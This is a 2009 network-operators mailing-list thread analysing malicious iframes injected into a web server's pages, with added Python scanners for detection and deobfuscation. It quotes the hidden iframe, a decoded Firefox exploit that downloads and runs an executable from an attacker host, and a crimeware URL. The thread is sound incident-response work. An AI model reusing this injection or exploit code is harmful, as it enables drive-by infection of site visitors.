RE: Malicious code just found on web server
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com

-----Original Message-----
From: Russell Berg
Sent: Friday, April 17, 2009 3:39 PM
To: 'nanog@nanog.org'
Subject: Malicious code just found on web server

We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today:

src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> </body> </html>

IP address resolves to mail.yaris.com; couldn't find any A/V site references to this.

Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.

Just a heads up for folks; we have a team investigating...

Russell Berg
Dir - Product Development
Airstream Communications
berg@wins.net
715-832-3726
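The injection Russell reports (a display:none, 0x0 iframe dropped in just before </body> on every index.html) is straightforward to sweep a webroot for. The script below is an added example and not code posted in the thread: it parses each page with Python's standard-library HTML parser, flags iframe/embed/object elements that are hidden by CSS or collapsed to 0 or 1 pixel, records whether the src points off-site, and also reports anything left after </html>, since appended payloads often land there. The sample pages are constructed here (the injected one is modelled on the snippet Russell posted); the directory layout in demo() is an assumption for the sake of a runnable sweep.

```python
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Elements that pull in remote content and are the usual carriers for drive-by injections.
LOADER_TAGS = {"iframe", "embed", "object"}


class HiddenLoaderFinder(HTMLParser):
    """Collects loader elements that are hidden by CSS or collapsed to 0/1 pixel."""

    def __init__(self):
        super().__init__()
        self.findings = []

    @staticmethod
    def _tiny(value):
        m = re.match(r"\s*(\d+)", value or "")
        return bool(m) and int(m.group(1)) <= 1

    def handle_starttag(self, tag, attrs):
        if tag not in LOADER_TAGS:
            return
        a = {name.lower(): (value or "") for name, value in attrs}
        src = a.get("src") or a.get("data")
        if not src:
            return
        style = re.sub(r"\s+", "", a.get("style", "")).lower()
        reasons = []
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via style")
        if self._tiny(a.get("width")) and self._tiny(a.get("height")):
            reasons.append("zero/one pixel size")
        if reasons:
            self.findings.append({"tag": tag, "src": src,
                                  "host": urlparse(src).hostname, "reasons": reasons})


def scan_html(text, own_hosts=()):
    """Return findings for one page: hidden/tiny loaders, plus any content trailing </html>."""
    parser = HiddenLoaderFinder()
    parser.feed(text)
    parser.close()
    findings = parser.findings
    for f in findings:
        f["external"] = f["host"] is not None and f["host"] not in own_hosts
    # Appended injections often land after the document's real end; anything but whitespace there is a red flag.
    _head, sep, tail = text.lower().rpartition("</html>")
    if sep and tail.strip():
        findings.append({"tag": None, "src": None, "host": None, "external": False,
                         "reasons": ["content after </html>"]})
    return findings


def scan_tree(root, names=("index.html", "index.htm", "404.html"), own_hosts=()):
    """Walk a webroot and return {path: findings} for every matching page with at least one finding."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in names:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_html(fh.read(), own_hosts)
            if findings:
                report[path] = findings
    return report


# Constructed sample pages (not captured from the compromised server).
INJECTED_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe>
</body>
</html>"""

CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="https://www.example.com/player" width="560" height="315"></iframe>
</body></html>"""

# Same benign page with a 1x0 embed appended after the real end of the document.
APPENDED_PAGE = CLEAN_PAGE + '\n<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>'


def demo():
    """Write the constructed pages into a temporary webroot and sweep it as the scan would run on a server."""
    with tempfile.TemporaryDirectory() as root:
        for sub, page in (("site-a", INJECTED_PAGE), ("site-b", CLEAN_PAGE)):
            os.makedirs(os.path.join(root, sub))
            with open(os.path.join(root, sub, "index.html"), "w", encoding="utf-8") as fh:
                fh.write(page)
        report = scan_tree(root)
    return {os.path.relpath(path, root): findings for path, findings in report.items()}


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, findings)
```

Pair the sweep with a modification-time check (Russell narrowed the change to one hour) and with a diff against a known-good copy of the site; the parser only tells you that a page carries a hidden loader, not how it got there.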
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54

That JavaScript writes this to the page (URL obscured):

document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the JavaScript, it grabs a PDF:

<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>

That PDF is on the site, I haven't looked at it yet though.

-ChrisAM
http://securabit.com

On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg <berg@wins.net> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate@gmail.com> wrote:
Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location.

We've been seeing a lot of this lately.

- - ferg

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ6P+Oq1pz9mNUZTMRAgINAJ9nFvTfdP0nNB5IXGCR5U5MKvbBxwCgoZQZ
1dYwVrqBqq9k7RVzAhXtYMY=
=bmbW
-----END PGP SIGNATURE-----

--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
Yes, definitely malicious:

http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b

- - ferg

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
/K0hKsJiAz4RGu8VQkyP+js=
=AzJq
-----END PGP SIGNATURE-----

--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/
You beat me to it.

-ChrisAM

On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
Nice, bad code is actually on all of the error (404) pages for the site as well as some other php pages.

The code is actually a base64 obfuscation technique to hide the actual attack code. Once decoded, the code attempts multiple attacks to try and get the victim to download an executable:

hxxp://77.92.158.122/webmail/inc/web/load.php

Virustotal results (3/40): http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3

Also, this code appears to be trying to exploit specific browser types (Chrome and Mozilla in particular) as can be seen from this code snippet of the decode. (Commented out each line just in case someone has a browser that will try and render this.)

//aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');");
//document.body.appendChild(aaa_2626aKiupwzqp);
//var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null, "Function");
//var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var file=C.classes['@mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile); file.initWithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")();
//window.file = aaa_2626aMiupwzqp(Components);
//var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return C.classes['@mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess); }")();
//window.process = aaa_2626aNiupwzqp(Components);
//var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){ io=C.classes['@mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService);source=io.newURI('http://77.92.158.122/webmail/inc/web/load.php','UTF8',null);persist=C.classes['@mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createInstance(C.interfaces.nsIWebBrowserPersist);persist.persistFlags=8192|4096;persist.saveURI(source,null,null,null,null,file); return persist; }")();
//window.persist = aaa_2626aOiupwzqp(Components,window.file);
//window.getState = aaa_2626aLiupwzqp("return function(persist) { return persist.currentState; }")();
//window.processRun = aaa_2626aLiupwzqp("return function(process,file) { process.init(file); process.run(false,[],0); }")();

Also attempts to download a hostile PDF file from a subdirectory underneath this one, which was created with a demo copy of Foxit.

hxxp://77.92.158.122/webmail/inc/web/include/two.pdf

INFO: Version 2.321001 (possibly)
Created: 2009-02-19 1448hrs (-2 timezone)

There appear to be several other attacks within this code. I can upload or update this thread if you are interested in the other attacks.

Jake

On Fri, Apr 17, 2009 at 6:34 PM, Chris Mills <securinate@gmail.com> wrote:
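Jake's point that the injected block only gives up its download URL once the base64 layers are peeled is the normal shape of these kits, and the decoding can be done statically, without ever letting a browser run the script. The following Python is an added example rather than anything posted in the thread: it finds long quoted base64 literals, decodes them in place, repeats until a fixed point, and then pulls out the indicators an analyst wants from the innermost layer (URLs, XPCOM contract IDs, Windows paths, the privileged Mozilla interfaces and the -moz-binding trick). The sample is constructed here by wrapping a shortened stand-in for the stage Jake quoted in two layers of eval(atob(...)); the URL, contract IDs and interface names in it come from the thread, while the dropped file name is a placeholder because the real kit built it from a variable.

```python
import base64
import binascii
import re

# A quoted run of 40+ base64-alphabet characters with optional padding: long enough to skip ordinary identifiers.
B64_LITERAL = re.compile(r"""(["'])([A-Za-z0-9+/]{40,}={0,2})\1""")

# Indicators worth pulling from the decoded script; chrome:// is included because the XBL trick points at one.
IOC_PATTERNS = {
    "url": re.compile(r"(?:https?|chrome)://[^\s'\"<>)]+"),
    "xpcom": re.compile(r"@mozilla\.org/[A-Za-z0-9/_.-]+;\d"),
    "win_path": re.compile(r"[A-Za-z]:\\\\?[^'\"\s]+\.exe", re.I),
    "privileged_api": re.compile(
        r"(?<![\w-])(nsIProcess|nsILocalFile|nsIWebBrowserPersist|-moz-binding)(?![\w-])"),
}


def try_b64(token):
    """Decode token if it is valid base64 that yields printable text; otherwise return None."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def peel(script, max_layers=10):
    """Replace every decodable base64 literal with its plaintext, repeating until nothing changes.

    Returns the successive layers; the last element is the innermost script recovered.
    """
    layers, current = [], script
    for _ in range(max_layers):
        changed = False

        def replace(match):
            nonlocal changed
            decoded = try_b64(match.group(2))
            if decoded is None:
                return match.group(0)
            changed = True
            return decoded

        current = B64_LITERAL.sub(replace, current)
        if not changed:
            break
        layers.append(current)
    return layers


def extract_iocs(text):
    """Run every indicator pattern over the text and return de-duplicated, sorted hits per category."""
    return {name: sorted(set(pattern.findall(text))) for name, pattern in IOC_PATTERNS.items()}


def triage(script):
    """Peel the obfuscation and report how many layers were removed plus the indicators found inside."""
    layers = peel(script)
    innermost = layers[-1] if layers else script
    return {"layers_decoded": len(layers), "iocs": extract_iocs(innermost)}


def _b64(text):
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


# Constructed stand-in for the decoded stage quoted in the thread (same XBL -moz-binding trick, contract IDs and
# download URL); 'PLACEHOLDER.exe' stands for the file name the real kit built from a variable.
STAGE2 = r"""
var k = document.createElement("div");
k.setAttribute("style", "display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');");
document.body.appendChild(k);
var F = k.stop.eval.call(null, "Function");
var file = C.classes['@mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile);
file.initWithPath('c:\\PLACEHOLDER.exe');
var source = io.newURI('http://77.92.158.122/webmail/inc/web/load.php', 'UTF8', null);
var proc = C.classes['@mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess);
"""

# Two layers of eval(atob(...)) around it: the shape the block takes on the compromised pages.
STAGE1 = 'eval(atob("%s"));' % _b64(STAGE2)
INJECTED = 'eval(atob("%s"));' % _b64(STAGE1)


if __name__ == "__main__":
    for category, hits in triage(INJECTED)["iocs"].items():
        print(category, hits)
```

Real kits mix in other encodings (percent-escapes, String.fromCharCode arrays, XOR with a key pulled from the page), so treat this as the first pass: when a layer stops changing but still looks encoded, that is the point to hand it to a JavaScript sandbox rather than to a browser.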
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate@gmail.com> wrote:
Not only is that .pdf malicious, when "executed" it also fetches additional malware from:

hxxp:// test1.ru /1.1.1/load.php

If that host is not in your block list, it should be -- known purveyor of crimeware.

This is in addition to the other malicious URLs mentioned in this thread.

- - ferg

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
mxM8Ci/feKnJe6M6qbiESPw=
=b0Yj
-----END PGP SIGNATURE-----

--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/
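Both the metadata Jake pulled from two.pdf (producer, creation date) and the second-stage URL Paul found when the file ran are recoverable by static triage, provided the Flate-compressed streams are inflated first, because that is where the JavaScript usually sits. The script below is an added example, not the thread's own analysis: it inflates every FlateDecode stream with zlib, reads the Info dictionary, counts the action keys that make a PDF dangerous (/OpenAction, /JavaScript, /JS, /Launch, and so on), resolves an indirect /JS reference to its stream, and extracts URLs. The PDF it runs on is constructed inline and is not the file from the thread: it carries an /OpenAction whose JavaScript calls app.launchURL (a real Acrobat JavaScript API) against the test1.ru URL Paul quoted, as a stand-in for whatever the real file did to fetch that URL; the producer string is a placeholder and the file has no cross-reference table, which matters to a viewer but not to this scan.

```python
import re
import zlib

# Dictionary keys whose presence makes a PDF worth a closer look.
RISKY_KEYS = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/URI", "/EmbeddedFile", "/RichMedia")


def inflate_streams(data):
    """Return the PDF bytes with every zlib-compressed stream body replaced by its inflated content."""
    out = data
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            out = out.replace(m.group(1), zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not FlateDecode (or damaged); leave the raw body in place
    return out


def object_stream(text, num):
    """Return the stream body (or the whole body if no stream) of object `num 0 obj`."""
    m = re.search(r"(?<!\d)%d 0 obj(.*?)endobj" % num, text, re.S)
    if not m:
        return ""
    s = re.search(r"stream\r?\n(.*?)\r?\nendstream", m.group(1), re.S)
    return s.group(1) if s else m.group(1).strip()


def parse_pdf_date(value):
    """Convert a PDF date such as D:20090219144800+02'00' to ISO 8601; None if absent or unparseable."""
    if not value:
        return None
    m = re.match(r"D:(\d{4})(\d{2})(\d{2})(\d{2})?(\d{2})?(\d{2})?(?:([Zz+-])(\d{2})'?(\d{2})?'?)?", value)
    if not m:
        return None
    y, mo, d, h, mi, s, sign, oh, om = m.groups()
    iso = "%s-%s-%sT%s:%s:%s" % (y, mo, d, h or "00", mi or "00", s or "00")
    if sign in ("Z", "z"):
        return iso + "Z"
    if sign:
        return iso + "%s%s:%s" % (sign, oh, om or "00")
    return iso


def pdf_triage(data):
    """Static triage: Info metadata, risky keys, every /JS script (inline or by reference) and URLs."""
    text = inflate_streams(data).decode("latin-1")
    info = {}
    for key in ("Creator", "Producer", "CreationDate", "ModDate"):
        m = re.search(r"/%s\s*\((.*?)\)" % key, text)
        if m:
            info[key] = m.group(1)
    risky = {k: text.count(k) for k in RISKY_KEYS if k in text}
    scripts = []
    # /JS is either a literal string (with backslash escapes) or an indirect reference `N 0 R` to a stream.
    for m in re.finditer(r"/JS\s*(?:\(((?:[^()\\]|\\.)*)\)|(\d+)\s+0\s+R)", text):
        scripts.append(m.group(1) if m.group(1) is not None else object_stream(text, int(m.group(2))))
    urls = sorted(set(re.findall(r"https?://[^\s'\"<>)]+", text)))
    return {"info": info, "created": parse_pdf_date(info.get("CreationDate")),
            "risky": risky, "scripts": scripts, "urls": urls}


def build_sample_pdf():
    """Constructed sample (not the file from the thread): an /OpenAction whose JavaScript lives in a Flate stream."""
    js = b'app.launchURL("http://test1.ru/1.1.1/load.php", true);'
    comp = zlib.compress(js)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /S /JavaScript /JS 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(comp) + comp + b"\nendstream",
        b"<< /Producer (constructed-sample) /CreationDate (D:20090219144800+02'00') >>",
    ]
    body = b"%PDF-1.4\n"
    for i, obj in enumerate(objs, 1):
        body += b"%d 0 obj\n" % i + obj + b"\nendobj\n"
    return body + b"trailer\n<< /Root 1 0 R /Info 6 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    for key, value in pdf_triage(build_sample_pdf()).items():
        print(key, value)
```

The creation timestamp and producer string are what Jake was reading off the file; the URL list is what Paul observed at run time, recovered here without opening the document. Real samples also use ASCIIHex, LZW and multi-filter chains, object streams and JavaScript split across several strings, so a miss from this pass means "inspect by hand", not "clean".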
Paul,

I noticed that in the PDF file but, as the domain doesn't seem to have resolution, I didn't mention it.

Jake

WHOIS information on the domain

Whois Record
domain: TEST1.RU
type: CORPORATE
nserver: ns1.centerhost.ru.
nserver: ns1.cetis.ru.
state: REGISTERED, DELEGATED
org: Center of Effective Technologies and Systems CETIS
phone: +7 4957711654
fax-no: +7 4957879251
e-mail: <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
e-mail: <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
registrar: REGRU-REG-RIPN
created: 2001.03.30
paid-till: 2010.04.03
source: TC-RIPN

Registry Data
Created: 2001-03-30
Expires: 2010-04-03
Whois Server: whois.ripn.net

Server Data
Domain Status: Registered And No Website

On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
participants (4)
- Chris Mills
- Jake Mailinglists
- Paul Ferguson
- Russell Berg